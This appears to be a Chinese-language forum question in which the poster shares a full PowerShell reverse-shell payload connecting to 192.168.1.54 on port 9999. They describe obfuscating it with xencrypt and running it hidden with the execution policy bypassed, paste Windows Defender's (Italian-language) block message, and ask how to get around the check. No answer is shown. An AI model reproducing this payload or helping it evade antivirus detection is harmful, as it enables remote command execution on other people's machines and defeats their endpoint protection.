我正在尝试在 Windows 10 上运行 powershell 反向 shell。无论如何,每次它都被 Wndows Defender 阻止。我怎样才能绕过它?
在一个文件中,我存储了有效负载$client = New-Object System.Net.Sockets.TCPClient('192.168.1.54',9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
然后我使用 xencrypt ( https://github.com/the-xentropy/xencrypt ) 来混淆代码但是当我运行powershell -NoP -NonI -W Hidden -Exec Bypass .\revshell.ps1
我明白了Questo script include contenuto dannoso ed è stato bloccato dal software antivirus.
In riga:18 car:1
+ IEX($piifnga)
+ ~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
问题: 有没有办法绕过这个检查?